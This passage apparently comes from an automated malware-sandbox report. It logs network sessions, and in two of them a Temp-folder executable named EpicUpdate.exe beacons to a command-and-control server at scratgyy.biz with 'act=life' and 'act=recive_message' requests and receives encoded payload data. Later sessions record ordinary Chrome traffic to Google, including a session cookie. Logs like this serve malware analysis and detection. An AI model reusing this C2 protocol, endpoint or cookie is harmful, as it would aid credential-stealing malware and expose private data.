"S":{"EventFlag":2},"HtmlPrefetchRequest":{"EventFlag":256},"RefreshCachedFiles":{"EventFlag":256},"DownloadResource":{"EventFlag":256},"Authentication":{"EventFlag":256},"ResultGroupToRender":{"EventFlag":256},"SendWebSocketRequest":{"EventFlag":256},"We
2024-10-27 16:03:30 UTC	6016	IN	Data Raw: 39 34 37 3a 33 30 36 33 35 2c 66 69 68 61 6c 77 61 79 73 69 6e 69 74 63 61 63 68 65 3a 33 32 38 32 39 38 2c 31 36 6d 62 66 72 61 67 6d 65 6e 74 3a 34 33 38 34 38 30 2c 66 69 73 74 61 34 30 37 3a 36 31 30 32 37 2c 66 69 65 6e 61 39 30 33 3a 36 35 39 34 34 2c 66 69 64 61 76 32 36 35 3a 35 35 30 33 35 2c 66 69 63 61 63 38 34 31 3a 34 39 36 36 34 2c 66 69 65 6e 61 34 31 35 3a 33 38 37 38 30 2c 66 69 65 6e 61 34 39 30 3a 33 34 31 38 31 2c 72 65 6d 6f 74 65 6d 6f 76 65 64 65 76 69 63 65 3a 34 32 35 30 30 2c 66 69 65 6e 61 32 37 36 3a 34 31 30 30 34 2c 66 69 65 6e 61 33 38 31 3a 34 39 39 39 37 22 2c 22 4f 66 66 69 63 65 5f 46 6c 6f 6f 64 67 61 74 65 22 3a 22 50 2d 52 2d 35 33 35 34 35 2d 34 2d 35 2c 50 2d 52 2d 34 39 37 33 36 2d 36 2d 32 32 2c 50 2d 52 2d 33 32 Data Ascii: 947:30635,fihalwaysinitcache:328298,16mbfragment:438480,fista407:61027,fiena903:65944,fidav265:55035,ficac841:49664,fiena415:38780,fiena490:34181,remotemovedevice:42500,fiena276:41004,fiena381:49997","Office_Floodgate":"P-R-53545-4-5,P-R-49736-6-22,P-R-32

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49745	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:32 UTC	259	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: scratgyy.biz
2024-10-27 16:04:32 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-27 16:04:32 UTC	1006	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qirk4hn0o446q3sq8l3hmulo18; expires=Thu, 20 Feb 2025 09:51:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BGQ1Hn4Aar80WYmukgCrPg1O1uqVxErQ6RaQez7Fxgr52woRxfdhw0syyBE%2FkkrBbCmblLUQiwUfvA1kJ4WBOeL2d9fynHRqMNCBNdvGQcnosgZ3%2FiJX%2FixJLWVLpQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ec254ae60f64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94200&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=903&delivery_rate=40602&cwnd=248&unsent_bytes=0&cid=b5f5c9171e06d276&ts=499&x=0"
2024-10-27 16:04:32 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-27 16:04:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.11.20	49746	104.21.64.165	443	1044	C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:33 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: scratgyy.biz
2024-10-27 16:04:33 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 51 78 69 4d 4a 49 2d 2d 52 45 44 4c 49 5a 41 52 44 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=QxiMJI--REDLIZARD&j=
2024-10-27 16:04:33 UTC	1012	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dgsla00gh8q4p65clkue0dbge5; expires=Thu, 20 Feb 2025 09:51:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qv0jx6Rvh7avPSuvpdIzqTYA%2Bm%2BKcv0JnL2nqGyDtOfQ88jSIaJtD5RgcH7hbpZxwJNfzokC%2BmIX2J7g8QFmQ%2Bgnj7pHHKepXJTOWQ%2B%2FtMVml59MR%2FqfA4jrF964RDs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d93ec2c2f97c46b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94795&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=947&delivery_rate=40358&cwnd=249&unsent_bytes=0&cid=171348b4857e6740&ts=519&x=0"
2024-10-27 16:04:33 UTC	357	IN	Data Raw: 31 64 37 63 0d 0a 77 78 6a 56 51 36 64 73 77 77 4e 4a 75 35 48 62 4a 36 51 63 66 45 67 61 51 69 39 33 30 71 75 4d 58 32 58 51 77 6b 67 67 30 2f 69 34 4f 71 4e 68 6e 56 6a 76 49 54 72 65 73 2b 46 54 31 6d 6b 5a 5a 44 67 6a 53 31 58 6f 7a 65 30 7a 46 72 58 75 61 6c 61 2b 32 76 6c 2b 74 43 2f 55 43 65 38 68 4c 4d 4f 7a 34 58 7a 66 50 68 6b 6d 4f 48 67 4e 45 72 6a 4a 37 54 4d 48 73 61 6b 6e 55 4c 2b 62 71 33 53 79 4b 38 49 50 70 32 49 6c 31 76 53 2b 51 73 56 32 45 69 46 33 4b 6b 4a 56 2f 6f 6e 70 4a 55 66 71 34 41 56 46 70 35 6d 4f 65 61 59 6f 68 52 48 76 65 47 76 65 2f 2f 6b 64 68 6e 30 5a 4b 6e 59 6b 53 78 79 36 77 2b 51 37 42 72 53 6f 4f 45 6d 31 6b 4b 74 36 73 53 72 49 42 72 4e 76 4c 39 48 2f 75 45 6a 46 50 6c 42 71 66 7a 67 4e 54 66 43 61 33 44 34 57 6f Data Ascii: 1d7cwxjVQ6dswwNJu5HbJ6QcfEgaQi930quMX2XQwkgg0/i4OqNhnVjvITres+FT1mkZZDgjS1Xoze0zFrXuala+2vl+tC/UCe8hLMOz4XzfPhkmOHgNErjJ7TMHsaknUL+bq3SyK8IPp2Il1vS+QsV2EiF3KkJV/onpJUfq4AVFp5mOeaYohRHveGve//kdhn0ZKnYkSxy6w+Q7BrSoOEm1kKt6sSrIBrNvL9H/uEjFPlBqfzgNTfCa3D4Wo
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 7a 49 39 4c 34 76 46 66 4e 64 78 4d 6e 65 43 31 48 47 72 50 4a 36 54 63 4e 76 61 6f 75 54 37 79 63 6f 58 72 33 62 34 55 4a 75 53 46 7a 6d 64 43 38 56 63 46 79 43 47 68 43 59 46 4a 62 71 59 6e 70 4d 55 66 71 34 43 4a 48 73 70 6d 71 64 62 51 70 7a 68 79 68 63 79 33 55 39 71 74 44 77 33 41 55 4b 57 6f 71 51 78 4f 7a 77 4f 55 30 41 72 57 6b 61 67 7a 78 6e 62 6b 36 37 32 48 6b 41 36 70 74 49 63 37 7a 2b 56 71 49 5a 31 34 74 64 47 41 56 56 62 54 49 36 6a 77 44 76 4b 34 75 54 72 65 55 72 48 57 78 4b 38 55 4a 71 32 6b 6a 32 50 36 79 53 73 5a 37 45 79 35 2b 4c 45 77 51 38 49 65 75 4f 68 2f 79 2b 47 70 73 74 70 6d 7a 4f 49 49 69 79 77 43 6d 64 32 76 47 76 61 41 46 77 58 4a 65 63 6a 67 75 53 42 71 69 79 50 77 34 43 61 43 73 4c 30 53 38 6d 61 39 36 73 69 62 49 41 4b Data Ascii: zI9L4vFfNdxMneC1HGrPJ6TcNvaouT7ycoXr3b4UJuSFzmdC8VcFyCGhCYFJbqYnpMUfq4CJHspmqdbQpzhyhcy3U9qtDw3AUKWoqQxOzwOU0ArWkagzxnbk672HkA6ptIc7z+VqIZ14tdGAVVbTI6jwDvK4uTreUrHWxK8UJq2kj2P6ySsZ7Ey5+LEwQ8IeuOh/y+GpstpmzOIIiywCmd2vGvaAFwXJecjguSBqiyPw4CaCsL0S8ma96sibIAK
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 76 61 41 46 77 58 4a 65 63 6a 67 73 52 42 57 37 77 2b 6f 39 41 4c 2b 6c 4b 55 57 79 6c 36 5a 77 75 53 62 42 41 71 68 73 4c 64 6e 30 76 55 44 55 65 78 63 6d 64 47 41 44 56 62 66 52 72 6d 56 48 6e 61 63 38 51 5a 36 5a 73 48 50 33 50 6f 73 58 34 57 59 6e 6d 61 76 35 51 73 4e 32 46 53 78 77 49 46 38 51 76 73 4c 76 4e 77 47 7a 72 53 5a 45 73 5a 75 68 66 4c 73 68 77 67 6d 7a 63 79 37 66 34 62 4d 46 69 44 34 5a 4d 6a 68 34 44 53 4f 67 33 76 38 72 52 59 65 6a 4a 45 79 32 6a 4f 46 6c 2b 54 69 46 43 61 30 68 63 35 6e 34 75 55 6e 42 64 68 67 75 63 43 39 43 48 4b 4c 49 34 6a 4d 56 74 61 41 6a 54 4c 36 57 71 48 65 77 4c 4d 34 45 72 47 55 73 32 4c 50 33 42 63 46 6d 58 6e 49 34 46 6c 30 59 76 4f 66 6c 4d 51 37 79 76 32 52 62 38 5a 32 74 4f 75 39 68 77 51 4b 70 61 79 54 Data Ascii: vaAFwXJecjgsRBW7w+o9AL+lKUWyl6ZwuSbBAqhsLdn0vUDUexcmdGADVbfRrmVHnac8QZ6ZsHP3PosX4WYnmav5QsN2FSxwIF8QvsLvNwGzrSZEsZuhfLshwgmzcy7f4bMFiD4ZMjh4DSOg3v8rRYejJEy2jOFl+TiFCa0hc5n4uUnBdhgucC9CHKLI4jMVtaAjTL6WqHewLM4ErGUs2LP3BcFmXnI4Fl0YvOflMQ7yv2Rb8Z2tOu9hwQKpayT
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 63 46 36 47 43 55 34 62 67 30 53 71 49 6d 32 66 53 69 56 6c 57 68 6a 69 39 71 2b 4e 4b 35 68 77 67 4c 68 4f 57 76 56 38 4c 56 4e 79 58 67 58 4a 6e 49 70 52 68 6d 37 7a 65 49 30 41 72 53 68 4c 30 65 77 6e 71 31 77 73 53 4c 47 41 61 35 75 49 35 6d 39 2b 55 4c 65 50 6b 5a 71 58 54 64 47 47 37 61 4a 38 58 4d 65 38 71 63 6d 41 75 6e 61 72 58 4f 78 4a 38 41 43 6f 47 63 6a 33 50 75 39 52 4d 42 34 48 53 56 38 4a 55 77 61 74 4d 58 67 4e 77 61 7a 72 43 46 4e 75 70 2f 68 4e 50 63 6d 33 55 37 35 49 52 72 61 35 61 35 56 79 6a 34 42 5a 47 46 67 53 68 6e 77 6b 61 34 38 46 62 69 71 4a 45 65 2b 6e 36 4a 31 73 43 7a 44 41 71 74 6f 49 39 2f 38 73 46 66 46 63 68 41 74 64 69 78 44 47 4c 72 4b 34 33 31 4a 38 71 63 79 41 75 6e 61 6a 58 32 36 44 38 34 43 70 69 45 30 6c 2b 72 35 Data Ascii: cF6GCU4bg0SqIm2fSiVlWhji9q+NK5hwgLhOWvV8LVNyXgXJnIpRhm7zeI0ArShL0ewnq1wsSLGAa5uI5m9+ULePkZqXTdGG7aJ8XMe8qcmAunarXOxJ8ACoGcj3Pu9RMB4HSV8JUwatMXgNwazrCFNup/hNPcm3U75IRra5a5Vyj4BZGFgShnwka48FbiqJEe+n6J1sCzDAqtoI9/8sFfFchAtdixDGLrK431J8qcyAunajX26D84CpiE0l+r5
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 5a 71 49 47 42 37 45 71 44 5a 37 58 38 32 70 4b 4d 38 53 62 79 57 34 57 58 35 4f 49 55 4a 72 53 46 7a 6d 66 57 32 54 4d 56 78 48 79 4e 30 4c 55 67 63 74 63 6a 6f 4f 51 32 34 6f 43 78 45 73 4a 2b 72 65 62 59 72 7a 41 6d 70 5a 69 6a 4c 73 2f 63 46 77 57 5a 65 63 6a 67 4a 53 67 65 2b 32 61 34 69 53 61 76 67 4c 55 37 78 77 75 46 2b 76 53 37 42 43 61 31 6e 4c 74 2f 2b 75 45 72 48 66 68 45 75 63 79 6c 4c 46 4c 33 4d 34 7a 6b 56 75 4b 73 6c 54 72 69 57 72 44 72 35 59 63 49 57 34 54 6c 72 36 50 36 33 53 38 46 6f 58 6a 55 32 4f 51 30 53 76 49 6d 32 66 51 61 2b 72 79 6c 4e 73 70 6d 67 63 4b 55 7a 79 51 65 70 5a 43 66 53 2f 62 39 58 77 48 45 58 4b 58 73 70 53 68 32 38 77 2b 30 36 52 2f 7a 67 4c 56 72 78 77 75 46 5a 6f 44 48 49 54 72 34 76 4d 70 6e 30 74 51 57 65 50 Data Ascii: ZqIGB7EqDZ7X82pKM8SbyW4WX5OIUJrSFzmfW2TMVxHyN0LUgctcjoOQ24oCxEsJ+rebYrzAmpZijLs/cFwWZecjgJSge+2a4iSavgLU7xwuF+vS7BCa1nLt/+uErHfhEucylLFL3M4zkVuKslTriWrDr5YcIW4Tlr6P63S8FoXjU2OQ0SvIm2fQa+rylNspmgcKUzyQepZCfS/b9XwHEXKXspSh28w+06R/zgLVrxwuFZoDHITr4vMpn0tQWeP
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 6d 51 68 71 35 77 4f 6f 31 42 4c 4b 6b 4c 6b 57 30 6d 61 31 78 73 43 4c 4b 43 71 68 76 49 74 61 7a 39 77 58 42 5a 6c 35 79 4f 41 46 57 46 72 7a 45 72 69 4a 4a 71 2b 41 74 54 76 48 43 34 58 61 35 4a 4d 55 45 70 32 55 75 33 2f 6d 38 52 63 31 39 45 53 35 2b 4a 45 49 56 75 38 44 76 4f 77 4b 34 71 79 78 50 73 70 79 6e 4f 76 6c 68 77 68 62 68 4f 57 76 35 36 4c 52 4a 77 54 34 42 5a 47 46 67 53 68 6e 77 6b 61 34 32 43 37 61 6e 4b 6b 2b 79 6b 71 52 2b 76 53 54 46 42 72 4e 70 4b 39 37 68 71 30 58 50 65 78 49 70 65 43 52 4c 48 4c 62 4b 36 6e 31 4a 38 71 63 79 41 75 6e 61 6a 48 61 77 43 4d 49 56 34 58 35 6c 77 4c 4f 2b 53 59 59 6d 58 69 74 7a 4b 6b 49 59 73 38 2f 74 4e 67 4b 34 6f 53 31 4b 76 49 69 69 64 62 67 6c 78 51 47 6e 5a 79 72 57 39 62 35 4d 78 33 59 5a 61 6a Data Ascii: mQhq5wOo1BLKkLkW0ma1xsCLKCqhvItaz9wXBZl5yOAFWFrzEriJJq+AtTvHC4Xa5JMUEp2Uu3/m8Rc19ES5+JEIVu8DvOwK4qyxPspynOvlhwhbhOWv56LRJwT4BZGFgShnwka42C7anKk+ykqR+vSTFBrNpK97hq0XPexIpeCRLHLbK6n1J8qcyAunajHawCMIV4X5lwLO+SYYmXitzKkIYs8/tNgK4oS1KvIiidbglxQGnZyrW9b5Mx3YZaj
2024-10-27 16:04:33 UTC	354	IN	Data Raw: 70 73 50 70 4c 51 43 6c 72 32 6f 4d 38 5a 58 68 49 6f 35 68 7a 41 6d 36 63 44 33 55 34 37 34 46 2b 54 42 65 4d 6a 68 34 44 53 43 7a 78 2b 41 36 45 61 50 74 44 56 53 37 6e 62 46 39 6f 43 36 46 51 4f 46 6e 61 34 47 67 39 77 58 43 62 31 35 79 4b 48 49 57 51 4f 4f 65 76 6d 38 59 2f 4c 6c 71 56 50 48 43 38 7a 54 33 4d 34 56 57 34 53 59 6f 79 2b 47 2f 52 74 42 39 57 52 52 47 42 31 63 59 74 74 37 2f 41 7a 6d 31 75 69 64 45 70 6f 76 74 62 37 51 76 79 77 6d 33 49 57 57 5a 2f 50 6b 64 2f 7a 35 57 61 6b 64 75 44 51 33 77 6b 61 34 49 42 4c 79 75 4c 56 53 67 31 34 5a 67 75 69 66 53 48 2b 45 76 61 39 2b 7a 34 52 57 49 50 68 6f 37 4f 48 67 64 52 2b 75 63 76 57 70 58 34 4c 39 6b 57 2f 47 4d 34 53 4c 6c 62 34 55 63 34 54 6c 72 6e 76 43 72 56 38 42 39 43 43 6b 2f 48 6e 4d Data Ascii: psPpLQClr2oM8ZXhIo5hzAm6cD3U474F+TBeMjh4DSCzx+A6EaPtDVS7nbF9oC6FQOFna4Gg9wXCb15yKHIWQOOevm8Y/LlqVPHC8zT3M4VW4SYoy+G/RtB9WRRGB1cYtt7/Azm1uidEpovtb7Qvywm3IWWZ/Pkd/z5WakduDQ3wka4IBLyuLVSg14ZguifSH+Eva9+z4RWIPho7OHgdR+ucvWpX4L9kW/GM4SLlb4Uc4TlrnvCrV8B9CCk/HnM
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 32 36 66 30 0d 0a 41 75 6e 49 37 7a 71 6c 59 5a 31 4f 35 6d 49 35 79 2f 57 36 55 38 55 35 49 42 52 37 4e 6b 41 61 75 38 6a 51 41 79 6d 2f 6f 53 6c 4d 38 36 75 33 64 36 63 69 77 41 6d 66 58 79 58 65 35 37 35 4c 77 48 35 65 5a 44 67 76 44 55 32 4a 69 61 5a 39 4f 50 7a 67 4d 67 4c 70 32 70 52 35 75 53 2f 43 47 4c 41 73 43 4d 2f 2b 74 6b 37 48 50 6c 42 71 66 6d 41 56 52 66 36 4a 36 69 78 48 36 76 42 34 47 65 54 4a 39 69 72 6c 50 6f 73 58 34 58 64 72 67 61 48 33 42 64 51 2b 52 6d 6f 2f 4c 6b 41 55 73 38 66 74 4c 78 57 30 6f 7a 78 42 39 71 53 66 57 37 6f 71 79 51 4f 75 61 68 58 6e 30 72 52 4f 79 6e 4d 52 49 55 59 65 57 42 61 2b 78 2b 6b 72 46 76 4c 75 61 6b 33 78 77 70 67 36 2f 32 48 36 51 4f 46 35 61 34 47 7a 6a 45 62 49 63 42 6b 38 61 57 31 73 47 4c 76 46 34 Data Ascii: 26f0AunI7zqlYZ1O5mI5y/W6U8U5IBR7NkAau8jQAym/oSlM86u3d6ciwAmfXyXe575LwH5eZDgvDU2JiaZ9OPzgMgLp2pR5uS/CGLAsCM/+tk7HPlBqfmAVRf6J6ixH6vB4GeTJ9irlPosX4XdrgaH3BdQ+Rmo/LkAUs8ftLxW0ozxB9qSfW7oqyQOuahXn0rROynMRIUYeWBa+x+krFvLuak3xwpg6/2H6QOF5a4GzjEbIcBk8aW1sGLvF4
2024-10-27 16:04:33 UTC	1369	IN	Data Raw: 6a 4f 46 43 33 6d 62 64 35 38 42 2f 37 4b 37 5a 69 4f 39 2f 77 68 33 76 74 63 68 67 74 59 69 64 4c 4d 35 43 4a 6f 48 30 49 38 76 67 54 41 76 6e 61 6e 6a 54 33 4f 59 56 57 34 56 51 6f 31 2f 32 2b 55 39 63 7a 4f 7a 31 37 4d 45 73 57 38 49 65 75 4f 30 66 71 38 47 51 43 74 59 76 68 49 75 64 7a 6e 6c 76 79 4e 6e 75 4c 37 50 64 63 68 6d 68 65 63 69 70 75 44 51 66 77 6b 61 35 36 42 4b 43 79 4c 45 47 6e 6d 65 5a 45 69 51 66 47 48 36 74 41 4a 73 6e 30 68 33 76 54 66 52 41 6b 66 7a 5a 63 56 66 36 4a 34 58 31 66 69 2b 42 69 44 72 65 5a 74 7a 71 49 62 34 55 57 34 54 6c 72 37 50 43 33 53 38 46 6f 44 32 64 65 49 31 77 66 6b 63 54 2b 4f 6b 66 38 34 43 77 43 36 63 6e 76 4f 72 4d 77 68 56 62 78 4d 33 43 4d 6f 4f 34 56 6c 47 46 51 4d 7a 67 32 44 55 33 69 68 36 34 76 52 2b Data Ascii: jOFC3mbd58B/7K7ZiO9/wh3vtchgtYidLM5CJoH0I8vgTAvnanjT3OYVW4VQo1/2+U9czOz17MEsW8IeuO0fq8GQCtYvhIudznlvyNnuL7PdchmhecipuDQfwka56BKCyLEGnmeZEiQfGH6tAJsn0h3vTfRAkfzZcVf6J4X1fi+BiDreZtzqIb4UW4Tlr7PC3S8FoD2deI1wfkcT+Okf84CwC6cnvOrMwhVbxM3CMoO4VlGFQMzg2DU3ih64vR+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49750	142.251.40.100	443	2768	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:37 UTC	807	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-10-27 16:04:37 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 16:04:37 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-FRta_1Q9B7H-Ch_e5evqVg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-27 16:04:37 UTC	836	IN	Data Raw: 33 33 64 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 63 6f 75 74 20 74 65 72 72 61 20 74 72 75 63 6b 22 2c 22 61 6c 61 62 61 6d 61 20 73 74 61 74 65 20 61 6c 61 62 61 6d 61 20 61 5c 75 30 30 32 36 6d 20 73 63 6f 72 65 22 2c 22 76 65 6e 6f 6d 20 64 65 61 74 68 20 6c 61 73 74 20 64 61 6e 63 65 22 2c 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 74 79 63 6f 6f 6e 20 63 6c 75 62 20 77 65 62 73 69 74 65 22 2c 22 6b 6e 69 63 6b 73 20 6e 62 61 20 67 20 6c 65 61 67 75 65 20 64 72 61 66 74 22 2c 22 73 6e 6c 20 68 6f 73 74 20 74 6f 6e 69 67 68 74 20 6f 63 74 6f 62 65 72 20 32 36 22 2c 22 6e 61 73 61 20 61 73 74 72 6f 6e 61 75 74 73 20 73 70 61 63 65 78 22 2c 22 69 6e 73 74 61 67 72 61 6d 20 68 61 6c 6c 6f 77 65 65 6e 20 6e 6f 74 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c Data Ascii: 33d)]}'["",["scout terra truck","alabama state alabama a\u0026m score","venom death last dance","monopoly go tycoon club website","knicks nba g league draft","snl host tonight october 26","nasa astronauts spacex","instagram halloween notes"],["","","",
2024-10-27 16:04:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49753	142.251.40.100	443	2768	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 16:04:37 UTC	710	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-10-27 16:04:38 UTC	844	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGJXJ-bgGIjBjKah9wGrJMTTp-NeylW3cNWLLiDs2v6zWNsaZdGDgstSYwTKUqhP1c1YJbAnaRSgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgsIlsn5uAYQruWcUhIEv2CW5Q Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Sun, 27 Oct 2024 16:04:38 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-27 16:04:38 UTC	411	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh
